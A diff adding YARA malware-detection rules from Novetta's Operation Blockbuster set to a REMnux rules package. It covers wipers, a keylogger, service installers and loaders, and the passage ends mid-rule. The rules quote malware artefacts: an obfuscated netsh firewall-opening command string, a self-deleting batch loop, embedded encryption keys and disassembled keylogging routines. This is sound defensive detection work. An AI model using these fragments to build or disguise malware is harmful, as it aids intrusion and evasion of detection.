+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B  73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
+		           
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/general.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/general.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/general.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/general.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,67 @@
+// yara rules that can cross boundaries between the various sets/types... more general detection signatures
+import "pe"
+
+rule wiper_unique_strings
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+	 	company = "novetta"
+
+	 strings:
+	 	$a = "C!@I#%VJSIEOTQWPVz034vuA"
+		$b = "BAISEO%$2fas9vQsfvx%$"
+		$c = "1.2.7.f-hanba-win64-v1"
+		$d = "md %s&copy %s\\*.* %s"
+		$e = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
+		$f = "Ge.tVol. .umeIn..for  mati.onW"
+	
+	condition:
+		$a or $b or $c or $d or $e or $f
+}
+
+
+rule wiper_encoded_strings
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+ 		company = "novetta"
+
+	 strings:
+	 	$scr = {89 D4 C4 D5 00 00 00}
+	 	$explorer = {E2 DF D7 CB C8 D5 C2 D5 89 C2 DF C2 00 00 00 }
+	 	$kernel32 = {CC C2 D5 C9 C2 CB 94 95  89 C3 CB CB 00 00 }
+
+	condition:
+		$scr or $explorer or $kernel32 
+}
+
+
+rule createP2P
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "CreatP2P Thread" wide
+
+	condition:
+		any of them
+}
+
+rule firewallOpener
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+	 $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
+	 
+	condition:
+		any of them
+		
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/HotelAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/HotelAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/HotelAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/HotelAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+import "pe"
+
+rule HotelAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "58dab205ecb1e0972027eb92f68cec6d208e5ab5.ex_"
+
+	strings:
+	
+	$resourceHTML = "RSRC_HTML"
+	/*
+		8A 0C 18  mov     cl, [eax+ebx]
+		80 F1 63  xor     cl, 63h
+		88 0C 18  mov     [eax+ebx], cl
+		8B 4D 00  mov     ecx, [ebp+0]
+		40        inc     eax
+		3B C1     cmp     eax, ecx
+		72 EF     jb      short loc_4010B4
+	*/
+
+	$rscsDecoderLoop = {8A [2] 80 F1 ?? 88 [2] 8B [2] 40 3B ?? 72 EF}
+
+	condition:
+		$resourceHTML and $rscsDecoderLoop in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+rule IndiaAlfa_One
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "HwpFilePathCheck.dll"
+		$ = "AdobeArm.exe"
+		$ = "OpenDocument"
+		
+	condition:
+		2 of them
+
+}
+
+rule IndiaAlfa_Two
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "ExePath: %s\nXlsPath: %s\nTmpPath: %s\n"
+		
+	condition:
+		any of them
+
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaBravo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaBravo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaBravo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaBravo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,96 @@
+import "pe"
+
+rule IndiaBravo_PapaAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "pmsconfig.msi" wide
+		$ = "scvrit001.bat"
+	condition:
+		all of them
+}
+
+rule IndiaBravo_RomeoCharlie
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_"
+		Status = "Signature is too loose to be useful."
+		
+	strings:
+	/*
+		50                 push    eax             ; argp
+		68 7E 66 04 80     push    8004667Eh       ; cmd
+		8B 8D DC FE FF FF  mov     ecx, [ebp+skt]
+		51                 push    ecx             ; s
+		FF 15 58 31 41 00  call    ioctlsocket
+		83 F8 FF           cmp     eax, 0FFFFFFFFh
+		75 08              jnz     short loc_4043F0
+	*/
+
+	$a = {50 68 7E 66 04 80 8B 8D [4] 51 FF 15 [4] 83 F8 FF 75}
+	$b1 = "xc123465-efff-87cc-37abcdef9"
+	$b2 = "[Check] - PORT ERROR..." wide
+	$b3 = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
+
+	condition:
+		2 of ($b*) or 
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule IndiaBravo_RomeoBravo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009"
+
+	strings:
+	/*
+		E8 C3 FE FF FF     call    generate64ByteRandomNumber
+		68 C8 01 00 00     push    1C8h            ; dwLength
+		68 D8 E8 40 00     push    offset g_Config ; pvBuffer
+		A3 80 EA 40 00     mov     dword ptr g_Config.qwIdentifier, eax
+		89 15 84 EA 40 00  mov     dword ptr g_Config.qwIdentifier+4, edx
+		E8 F9 E9 FF FF     call    DNSCALCDecode
+		83 C4 08           add     esp, 8
+		8D 4C 24 08        lea     ecx, [esp+214h+var_20C]
+		6A 00              push    0
+		51                 push    ecx
+		68 C8 01 00 00     push    1C8h
+		68 D8 E8 40 00     push    offset g_Config
+		56                 push    esi
+		FF 15 74 E7 40 00  call    WriteFile_9
+		56                 push    esi
+		FF 15 6C E7 40 00  call    CloseHandle_9
+	*/
+
+	$a = {E8 [4] 68 [2] 00 00 68 [4] A3 [4]	89 15 [4] E8 [4] 83 C4 08 8D [3] 6A 00 5? 68 [2] 00 00 	68 [4] 5? FF 15 [4] 5? 	FF 15}
+		
+		$b1 = "tmscompg.msi" wide
+		$b2 = "cvrit000.bat"
+
+	condition:
+		2 of ($b*) or 
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+rule IndiaBravo_generic
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$extractDll = "[2] - Extract Dll..." wide
+		$createSvc = "[3] - CreateSVC..." wide
+
+	condition:
+		all of them
+	
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+rule IndiaCharlie_One
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "WMPNetworkSvcUpdate"
+		$ = "backSched.dll"
+		$ = "\\mspaint.exe"
+		$aesKey = "X,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT"
+	condition:
+		2 of them or $aesKey
+}
+
+rule IndiaCharlie_Two
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$s1 = "%s is an essential element in Windows System configuration and management. %s"
+		$s2 = "%SYSTEMROOT%\\system32\\svchost.exe -k "
+		$s3 = "%s\\system32\\%s"
+		$s4 = "\\mspaint.exe"
+		$s5 = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
+		$aesKey = "}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX"
+
+	condition:
+		3 of ($s*) or $aesKey
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaDelta.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaDelta.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaDelta.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaDelta.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,30 @@
+import "pe"
+
+rule IndiaDelta
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "d7b50b1546653bff68220996190446bdc7fc4e38373715b8848d1fb44fe3f53c"
+
+	strings:
+	/*
+		FF 15 DC 2D 41 00  call    ReadFile_0
+		8B 44 24 20        mov     eax, [esp+25Ch+offsetInFile]
+		8B 54 24 1C        mov     edx, [esp+25Ch+dwEmbedCnt]
+		35 78 56 34 12     xor     eax, 12345678h
+		55                 push    ebp
+		55                 push    ebp
+		81 F2 78 56 34 12  xor     edx, 12345678h
+		50                 push    eax
+		57                 push    edi
+		89 54 24 2C        mov     [esp+26Ch+dwEmbedCnt], edx
+		89 44 24 30        mov     [esp+26Ch+offsetInFile], eax
+		FF 15 E0 2D 41 00  call    SetFilePointer_0
+	*/
+
+	$a =   {FF 15 [4-12] 3? 78 56 34 12 [0-2] 8? ?? 78 56 34 12 [0-10] FF 15}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaEcho.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaEcho.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaEcho.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaEcho.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+import "pe"
+
+rule IndiaEcho
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "66a21f8c72bb4f314604526e9bf1736f75b06cf37dd3077eb292941b476c3235"
+
+	strings:
+	/*
+		69 C0 28 01 00 00  imul    eax, 128h
+		50                 push    eax             ; size_t
+		53                 push    ebx             ; int
+		FF B5 AC FD FF FF  push    [ebp+configRecords]; void *
+		E8 6E 08 00 00     call    _memset
+		8B 85 A4 FC FF FF  mov     eax, [ebp+var_35C.dwRecordCnt]
+		69 C0 28 01 00 00  imul    eax, 128h
+		50                 push    eax             ; size_t
+		8B 85 C4 FE FF FF  mov     eax, [ebp+hMem]
+		05 08 01 00 00     add     eax, 108h
+		50                 push    eax             ; void *
+		FF B5 AC FD FF FF  push    [ebp+configRecords]; void *
+		E8 0A 05 00 00     call    _memcpy
+		83 C4 18           add     esp, 18h
+		8B BD A4 FC FF FF  mov     edi, [ebp+var_35C.dwRecordCnt]
+		69 FF 28 01 00 00  imul    edi, 128h
+		81 C7 08 01 00 00  add     edi, 108h
+	*/
+
+	$a = {69 ?? 28 01 00 00 5? 5? FF B5 [4] E8 [4] 8B [5] 69 ?? 28 01 00 00	50 8B [5] (05 08 01 00 00 | 03 ??) 50 FF [5] E8 [4] 83 C4 ?? 8B [5] 69 ?? 28 01 00 00 (81 C7 08 01 00 00 | 03 ??)}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaGolf.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaGolf.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaGolf.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaGolf.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,30 @@
+import "pe"
+
+rule IndiaGolf
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "3dda69dfb254dcaea2ba6e8323d4b61ab1e130a0694f4c43d336cfb86a760c50"
+
+	strings:
+	/*
+		FF D6        call    esi ; rand
+		8B F8        mov     edi, eax
+		C1 E7 10     shl     edi, 10h
+		FF D6        call    esi ; rand
+		03 F8        add     edi, eax
+		89 7C 24 20  mov     [esp+2A90h+var_2A70], edi
+		FF D6        call    esi ; rand
+		8B F8        mov     edi, eax
+		C1 E7 10     shl     edi, 10h
+		FF D6        call    esi ; rand
+		03 F8        add     edi, eax
+		89 7C 24 24  mov     [esp+2A90h+var_2A6C], edi
+	*/
+
+	$generateRandomID = {FF ?? 8B ?? C1 ?? 10 FF ?? 03 F8 89 [3] FF ?? 8B ?? C1 ?? 10 FF ?? 03 ?? 89}
+
+	condition:
+		$generateRandomID in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaHotel.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaHotel.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaHotel.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaHotel.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+import "pe"
+
+rule IndiaHotel
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "8a4fc5007faf85e07710dca705108df9fd6252fe3d57dfade314120d72f6d83f"
+
+	strings:
+	/*
+		6A 0A              push    0Ah             ; int
+		8D 85 C4 E4 FF FF  lea     eax, [ebp+Source]
+		68 10 02 00 00     push    210h            ; unsigned int
+		50                 push    eax             ; void *
+		E8 FA 60 00 00     call    ??_L@YGXPAXIHP6EX0@Z1@Z; `eh vector constructor iterator'(void *,uint,int,void (*)(void *),void (*)(void *))
+	*/
+
+	$fileExtractorArraySetup = {6A 0A 8D [5-6] 68 10 02 00 00 50 E8}
+
+	condition:
+		$fileExtractorArraySetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaJuliett.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaJuliett.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaJuliett.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaJuliett.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,62 @@
+import "pe"
+
+rule IndiaJuliett_1
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source_writeFile = "a164c0ba0be7c33778c12a6457e9c55a2935564a"
+
+
+	strings:
+		$configFilename = {00 73 63 61 72 64 70 72 76  2E 64 6C 6C 00}
+		$suicideScript = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
+		$commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }
+		/*
+		.text:10001850                 push    7530h           ; dwTimeout
+		.text:10001855                 lea     eax, [esp+420h+a2]
+		.text:10001859                 push    4               ; len
+		.text:1000185B                 push    eax             ; a2
+		.text:1000185C                 push    esi             ; s
+		.text:1000185D                 mov     dword ptr [esp+42Ch+a2], 1000h
+		.text:10001865                 call    CommSendWithTimeout
+		.text:1000186A                 add     esp, 14h
+		.text:1000186D                 cmp     eax, 0FFFFFFFFh
+		.text:10001870                 jz      loc_10001915
+		.text:10001876                 lea     ecx, [esp+418h+random]
+		.text:1000187A                 push    ecx             ; a1
+		.text:1000187B                 call    Generate16ByteRandomBuffer
+		.text:10001880                 push    0               ; fEncrypt
+		.text:10001882                 push    7530h           ; dwTimeout		
+		*/
+		$handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }
+
+		/*
+			68 00 28 00 00     push    2800h
+			56                 push    esi
+			E8 38 F7 FF FF     call    sub_401000
+			// optionally there is a "add esp, 8" in some variants here
+			8D 44 24 28        lea     eax, [esp+270h+NumberOfBytesWritten]
+			6A 00              push    0               ; lpOverlapped
+			50                 push    eax             ; lpNumberOfBytesWritten
+			68 00 28 00 00     push    2800h           ; nNumberOfBytesToWrite
+			56                 push    esi             ; lpBuffer
+			53                 push    ebx             ; hFile
+			FF 15 6C 80 40 00  call    ds:WriteFile
+			81 ED 00 28 00 00  sub     ebp, 2800h
+			81 C7 00 28 00 00  add     edi, 2800h
+			81 C6 00 28 00 00  add     esi, 2800h
+		*/
+	
+		$writeFile = {68 00 28 00 00 5?	E8 [4-7] 8D [3] 6A 00 5? 68 00 28 00 00 5? 5? FF 15 [4] 81 ?? 00 28 00 00 81 ?? 00 28 00 00 81 ?? 00 28 00 00}
+				
+	condition:
+		($configFilename in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or 
+			$suicideScript in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)))
+		or
+		($handshake in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)) and 
+			$commKey in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)))
+		or
+		 $writeFile in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaWhiskey.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaWhiskey.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/IndiaWhiskey.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/IndiaWhiskey.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+import "pe"
+
+rule IndiaWhiskey
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"		
+		Source = "0c729deec341267c5a9a2271f20266ac3b0775d70436c7770ddc20605088f3b4"
+		Description = "Winsec Installer"
+		
+	strings:
+	/*
+		// Service installation code
+		FF 15 68 30 40 00  call    ds:wsprintfA
+		83 C4 18           add     esp, 18h
+		8D 85 FC FE FF FF  lea     eax, [ebp+var_104]
+		56                 push    esi
+		56                 push    esi
+		56                 push    esi
+		56                 push    esi
+		56                 push    esi
+		50                 push    eax
+		6A 01              push    1
+		// some variants have these two lines added
+		5E                 pop     esi
+		56                 push    esi
+
+		6A 02              push    2
+		68 20 01 00 00     push    120h
+		68 FF 01 0F 00     push    0F01FFh
+		FF 75 0C           push    [ebp+arg_4]
+		FF 75 08           push    [ebp+arg_0]
+		
+		// some variants have the next line as a push {reg} or push {stack var}
+		53                 push    ebx
+		//or
+		FF 75 FC           push    [ebp+var_4]
+
+		FF 15 E4 49 40 00  call    CreateServiceA
+	*/
+
+	$a = {FF 15 [4] 83 C4 18 8D [5] 5? 5? 5? 5? 5? 5? 6A 01	[0-2] 6A 02 68 20 01 00 00 68 FF 01 0F 00 FF 75 ?? FF 75 ?? (5? | FF 75 ??) FF 15}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/KiloAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/KiloAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/KiloAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/KiloAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,79 @@
+import "pe"
+
+rule KiloAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		type = "Keylogger"
+		SourceForDnscalcVariant1 = "b855d05ef7ab6582864c9b35052a1073a6eb7d0c7e9d97f524ec062715d71321"
+		SourceForDnscalcVariant2 = "ddde628be8cd5db768b807510ae1319888e6c4550a5b9a0d54e17b9ec4aaa256"
+		
+	strings:
+		/*
+		push    <variable>
+		call    GetAsyncKeyState
+		cmp     ax, 8001h
+		jnz     short loc_4021EE
+		push    <variable>             ; a1
+		call    AddCharacterToKeyLogBuffer
+		add     esp, 4
+		
+		this block of code is used multiple times in sequence so i'm looking for 5 consecutive blocks
+		*/
+		$keyxlate = {68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04}
+		
+	/*
+		6A 2A                    push    2Ah
+		C6 84 24 C4 00 00 00 D6  mov     [esp+70Ch+var_648], 0D6h
+		C6 84 24 C5 00 00 00 E1  mov     [esp+70Ch+var_647], 0E1h
+		C6 84 24 C6 00 00 00 BF  mov     [esp+70Ch+var_646], 0BFh
+		C6 84 24 C7 00 00 00 C8  mov     [esp+70Ch+var_645], 0C8h
+		C6 84 24 C8 00 00 00 C3  mov     [esp+70Ch+var_644], 0C3h
+		C6 84 24 C9 00 00 00 BD  mov     [esp+70Ch+var_643], 0BDh
+		88 9C 24 CA 00 00 00     mov     [esp+70Ch+var_642], bl
+		FF 15 48 5B 40 00        call    GetAsyncKeyState
+		66 3D 01 80              cmp     ax, 8001h
+		75 20                    jnz     short loc_401696
+		8D 94 24 00 01 00 00     lea     edx, [esp+708h+pszOutput]
+		8D 84 24 C0 00 00 00     lea     eax, [esp+708h+var_648]
+		52                       push    edx             ; pszOutput
+		6A 07                    push    7               ; dwLength
+		50                       push    eax             ; pszInput
+		E8 A3 F9 FF FF           call    DNSCALCDecode
+		50                       push    eax             ; a1
+		E8 7D FB FF FF           call    AddEntryToKeylogDataBuffer
+		83 C4 10                 add     esp, 10h
+	*/
+
+	$keyxlateDnscalc1 = {	6A 2A C6 [6] D6 C6 [6] E1 C6 [6] BF C6 [6] C8 C6 [6] C3 C6 [6] BD	88 [6] FF 15 [4] 66 3D 01 80 75 ?? 	8D [6] 8D [6] 5? 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }	
+
+	/*
+		6A 2A                          push    2Ah
+		C7 85 74 FF FF FF D6 E1 BF C8  mov     dword ptr [ebp+var_8C], 0C8BFE1D6h
+		66 C7 85 78 FF FF FF C3 BD     mov     [ebp+var_88], 0BDC3h
+		88 9D 7A FF FF FF              mov     [ebp+var_86], bl
+		FF 15 04 47 41 00              call    GetAsyncKeyState
+		BA 01 80 FF FF                 mov     edx, 0FFFF8001h
+		66 3B C2                       cmp     ax, dx
+		75 1E                          jnz     short loc_4018B0
+		8D 85 CC FE FF FF              lea     eax, [ebp+a3]
+		50                             push    eax             ; a3
+		8D 8D 74 FF FF FF              lea     ecx, [ebp+var_8C]
+		6A 07                          push    7               ; dwLength
+		51                             push    ecx             ; a1
+		E8 89 F7 FF FF                 call    DNSCalcDecode
+		50                             push    eax             ; a1
+		E8 83 F9 FF FF                 call    RecordStringToLog
+		83 C4 10                       add     esp, 10h
+	*/
+
+	$keyxlateDnscalc2 = { 6A 2A C7 [5] D6 E1 BF C8 	66 [6] C3 BD 88 [5]	FF 15 [4] BA 01 80 FF FF 66 3B C2 75 ?? 8D [5] 5? 8D [5] 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }
+	
+	condition: 
+		$keyxlate in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $keyxlateDnscalc1 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $keyxlateDnscalc2 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+	
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/LimaAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/LimaAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+import "pe"
+
+rule LimaAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "c9fbad7fc7ff7688776056be3a41714a1f91458a7b16c37c3c906d17daac2c8b"
+		Status = "Signature is too loose to be useful."
+
+	strings:
+	/*
+		33 C0              xor     eax, eax
+		66 8B 02           mov     ax, [edx]
+		8B E8              mov     ebp, eax
+		81 E5 00 F0 FF FF  and     ebp, 0FFFFF000h
+		81 FD 00 30 00 00  cmp     ebp, 3000h
+		75 0D              jnz     short loc_4019FB
+		8B 6C 24 18        mov     ebp, [esp+10h+arg_4]
+		25 FF 0F 00 00     and     eax, 0FFFh
+		03 C7              add     eax, edi
+		01 28              add     [eax], ebp
+	*/
+
+	$a = {33 C0 66 [2] 8B ?? 81 ?? 00 F0 FF FF 81 ?? 00 30 00 00 75 ?? 8B [3] 25 FF 0F 00 00 03 C7 01}
